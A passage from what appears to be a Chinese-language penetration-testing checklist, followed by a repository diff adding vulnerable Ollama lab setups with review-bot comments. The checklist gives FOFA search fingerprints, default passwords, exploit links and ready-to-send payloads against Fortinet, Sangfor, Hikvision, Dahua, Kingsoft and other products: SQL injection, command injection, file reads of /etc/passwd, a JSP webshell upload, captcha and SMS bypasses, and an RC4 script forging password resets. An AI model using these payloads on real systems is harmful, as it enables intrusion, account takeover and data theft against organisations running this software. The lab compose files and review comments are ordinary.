t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
```
#### 无密码登录
```
任意用户名 密码:;id
```
### 0x07 VPN
#### Fortigate SSL VPN
FOFA
```
fofa: icon_hash="-404383634" app="FORTINET-防火墙"
```
##### 密码读取 CVE-2018-13379
exphttps://github.com/milo2012/CVE-2018-13379
##### 任意密码重置 CVE-2018-13382
exphttps://github.com/milo2012/CVE-2018-13382
##### 认证绕过 CVE-2022-40684
exphttps://github.com/horizon3ai/CVE-2022-40684
```
git clone https://github.com/horizon3ai/CVE-2022-40684.git
cd CVE-2022-40684
ssh-keygen -t rsa
python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub
ssh admin@1.1.1.1
```
#### Palo Alto SSL VPN
##### GlobalProtect 远程代码执行 CVE-2019-1579
exphttps://github.com/securifera/CVE-2019-1579
#### Pulse Secure SSL VPN
##### 任意文件读取 CVE-2019-11510
exphttps://github.com/projectzeroindia/CVE-2019-11510
##### 远程代码执行 CVE-2019-11539
exphttps://github.com/0xDezzy/CVE-2019-11539
#### 深信服 VPN
##### 常见密码
```
admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b
```
##### 口令爆破
用户登录若多次尝试登录失败会要求输入验证码若输入错误的验证码会提示“校验码错误或校验码已过期”修改登录请求的数据包清空cookie和验证码字段的值即可绕过验证码此时提示“用户名或密码错误”。
```
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
```
##### 短信绕过
```
POST https://ip/por/changetelnum.csp?apiversion=1
newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
```
##### 任意密码重置
加密算法使用了默认的key攻击者构利用key构造重置密码数据包从而修改任意用户的密码。利用需要登陆账号。
- M7.6.6R1版本key为20181118
- M7.6.1key为20100720
```
POST /por/changepwd.csp
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
```
```python
from Crypto.Cipher import ARC4
from binascii import a2b_hex
def myRC4(data, key):
rc41= ARC4.new(key)
encrypted =rc41.encrypt(data)
return encrypted. encode('hex')
def rc4_decrpt_hex(data, key):
rc41= ARC4. new(key)
return rc41. decrypt(a2b_hex(data))
key= '20100720'
data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
print myRC4(data, key)
```
#### 锐捷 SSL VPN
FOFA
```
icon_hash="884334722" || title="Ruijie SSL VPN"
```
##### 越权访问
- UserName 参数为已知用户名
```
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
```
#### Juniper SSL VPN
- [Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities](https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/)
## 三、终端响应与检测
### 0x01 EDR/杀软
#### 深信服 EDR
##### 命令执行1
exphttps://github.com/BH2UOL/sangfor-edr-exploit
##### 命令执行2
```
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
{"params":"w=123\"'1234123'\"|命令"}
```
##### 后台任意用户登录
```
xxx.xxx.xxx.xxx/ui/login.php?user=admin
```
#### 360天擎
FOFA
```
title="360天擎"
```
##### 前台SQL注入
```
/api/dp/rptsvcsyncpoint?ccid=1
```
##### 数据库信息泄露
```
http://x.x.x.x/api/dbstat/gettablessize
```
#### 金山 V8 终端安全系统
FOFA
```
title="在线安装-V8+终端安全系统Web控制台"
```
##### 任意文件读取
```
/htmltopdf/downfile.php?filename=downfile.php
```
##### pdf_maker.php 命令执行
```
POST /inter/pdf_maker.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
```
#### 金山 VGM防毒墙
FOFA
```
"金山VGM"
```
##### downFile.php 任意文件读取
poc
```
/downFile.php?filename=../../../../etc/passwd
```
### 0x02 数据防泄漏系统
#### 天融信数据防泄漏系统
##### 越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
```
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
```
## 四、其他
### 0x01 网络摄像机
#### Hikvision DS/IDS/IPC 等设备
FOFA
```
"671-1e0-587ec4a1"
```
##### 远程命令执行 CVE-2021-36260 ✅
```
python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd "ls"
```
### 0x02 综合管理平台
#### 大华 智慧园区综合管理平台
FOFA
```
app="dahua-智慧园区综合管理平台"
```
##### user_save.action 任意文件上传 ✅
漏洞指纹:
```
POST /admin/user_save.action
```
```
POST /WPMS/getPublicKey
```
#### 大华 城市安防监控系统平台管理
FOFA
```
"attachment_downloadByUrlAtt.action"
```
##### attachment_downloadByUrlAtt.action 任意文件下载 ✅
poc
```
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
```
#### Hikvision iVMS-8700综合安防管理平台
FOFA
```
icon_hash="-911494769"
```
##### 任意文件下载 ✅
验证POCtoken 为 URL md5
```
/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1
```
##### 任意文件上传 ✅
发送请求包上传文件:
```
POST /eps/resourceOperations/upload.action HTTP/1.1
Host:
------WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
Content-Type: image/jpeg
<%out.print("hello");%>
------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
```
访问webshell
```
/eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp
```

View File

@ -4,11 +4,6 @@
## 0x01 项目导航
- CHECKLIST
* Nacos 漏洞 Checklist
* SmartBi 漏洞 Checklist
* 安全设备漏洞 Checklist
- CMS漏洞
* 74cms v4.2.1 v4.2.129 后台getshell漏洞
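Review bot: the three CHECKLIST entries (Nacos, SmartBi, 安全设备) are removed together with their files, which keeps the index consistent, but the hunk gives the reader no replacement location. If the checklists now live elsewhere, add a single line under 项目导航 pointing there; if they are retired, say so in the commit message so the deletion is not mistaken for an accident.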
@ -737,6 +732,9 @@
* VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
- 人工智能漏洞
* Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568
* Ollama 文件存在性泄露漏洞 CVE-2024-39719
* Ollama 文件存在性泄露漏洞 CVE-2024-39722
* Ollama 目录遍历致代码执行漏洞 CVE-2024-37032
- 其他漏洞
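Review bot: the two new entries for CVE-2024-39719 and CVE-2024-39722 carry the identical title "Ollama 文件存在性泄露漏洞", so the index cannot tell them apart; give each the endpoint or condition that distinguishes it (the way the CVE-2024-37032 entry names 目录遍历致代码执行). Also consider listing the three in CVE-number order (37032, 39719, 39722) so the list matches the ordering used elsewhere in this section.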

View File

@ -0,0 +1,11 @@
services:
ollama:
image: ollama/ollama:0.1.33
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
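Review bot: `"11434:11434"` publishes the Ollama API on every interface, and the API has no authentication; since this compose file exists to run a deliberately vulnerable 0.1.33 (the README hunk in this commit adds 目录遍历致代码执行 for it), bind it to loopback instead: `- "127.0.0.1:11434:11434"`, so the lab box does not expose an exploitable service to the network while someone is reproducing the bug.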

View File

@ -0,0 +1,11 @@
services:
ollama:
image: ollama/ollama:0.1.45
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
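Review bot: this file is byte-for-byte the 0.1.33 compose file with only the image tag changed, and a third copy for 0.3.14 follows; three copies will drift. One compose file with `image: ollama/ollama:${OLLAMA_TAG:-0.1.33}` and a `.env` (or `OLLAMA_TAG=0.1.45 docker compose up -d`) covers all three versions and keeps any later hardening (port binding, resource limits) in one place.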

View File

@ -0,0 +1,11 @@
services:
ollama:
image: ollama/ollama:0.3.14
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
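Review bot: all three compose files declare the same named volume `ollama` and the same `container_name: ollama`, so they cannot run side by side, and whatever was pulled or planted under `/root/.ollama` while testing one version persists into the next (a file dropped via the 0.1.33 traversal would still be there when 0.3.14 is started to confirm the fix). Use a version-specific volume name per file, or document `docker compose down -v` between runs, so fix verification starts from a clean store.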

View File

@ -22,10 +22,26 @@ Ollama < 0.1.34
## 环境搭建
Docker 启动 Ollama 0.1.33 服务:
docker-compose.yml
```
docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33
services:
ollama:
image: ollama/ollama:0.1.33
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
```
执行如下命令启动 Ollama 0.1.33 服务:
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.1.33 已经成功运行。
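Review bot: the fence that replaces the `docker run` one-liner has no language tag; mark it ```yaml so the compose block renders with the indentation that YAML depends on (the volume and port entries are nested under `ollama:`, which is easy to lose without it). The block also duplicates the docker-compose.yml added for 0.1.33 in this same commit; linking that file instead of inlining it avoids two copies to keep in sync. The unchanged context line still reads "Ollma 0.1.33"; worth fixing to "Ollama" while touching this section.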
@ -85,4 +101,4 @@ https://github.com/Bi0x/CVE-2024-37032
## 漏洞修复
官方已经发布 0.1.34 修复该漏洞,建议升级至 0.1.34 及其以上版本。
- 升级至最新版本 https://github.com/ollama/ollama
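Review bot: the text names 0.1.34 as the fixed version but the link goes to the repository root (https://github.com/ollama/ollama); point it at the 0.1.34 release or tag instead so a reader can check the fix version directly rather than searching the release list.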
